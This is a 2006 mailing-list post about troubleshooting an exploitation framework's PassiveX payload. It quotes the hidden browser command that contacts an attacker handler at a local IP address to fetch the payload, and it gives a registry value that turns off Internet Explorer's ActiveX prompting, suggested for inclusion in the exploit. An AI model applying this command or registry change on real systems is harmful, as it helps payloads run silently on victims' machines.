[framework] Using the PassiveX payload
Feature Meister
featuremeister at googlemail.com
Fri May 5 11:18:44 CDT 2006
Hi,
the dll does not get downloaded into %WINDIR%\Downloaded Program Files.
After some more troubleshooting and debugging (with process explorer)
I found out that the hidden IE is started with "...\iexplore.exe -new
http://192.168.71.75:8000/.
So I tried this one from a regular command line.
Result: IE prevented an ActiveX Control from being loaded and executed
automatically. Instead I was presented with a pop-up and the usual IE
information bar.
I then looked at the security settings of Internet-Zone. Besides
"Automatic prompting for ActiveX controls" everythin was set so that
the control would execute without asking.
However the above setting was set to "Disable". I changed it to
"Enable" according to the helpful help dialog ;-) and tried it again:
it works!
The required setting in
HKCU\Software\Microsoft\Windows\CurrentVersion\Internet
Settings\Zones\3 would be:
"2201"=dword:00000000
probably this could be added to the actual exploit code?
Cheers,
Marco
More information about the framework
mailing list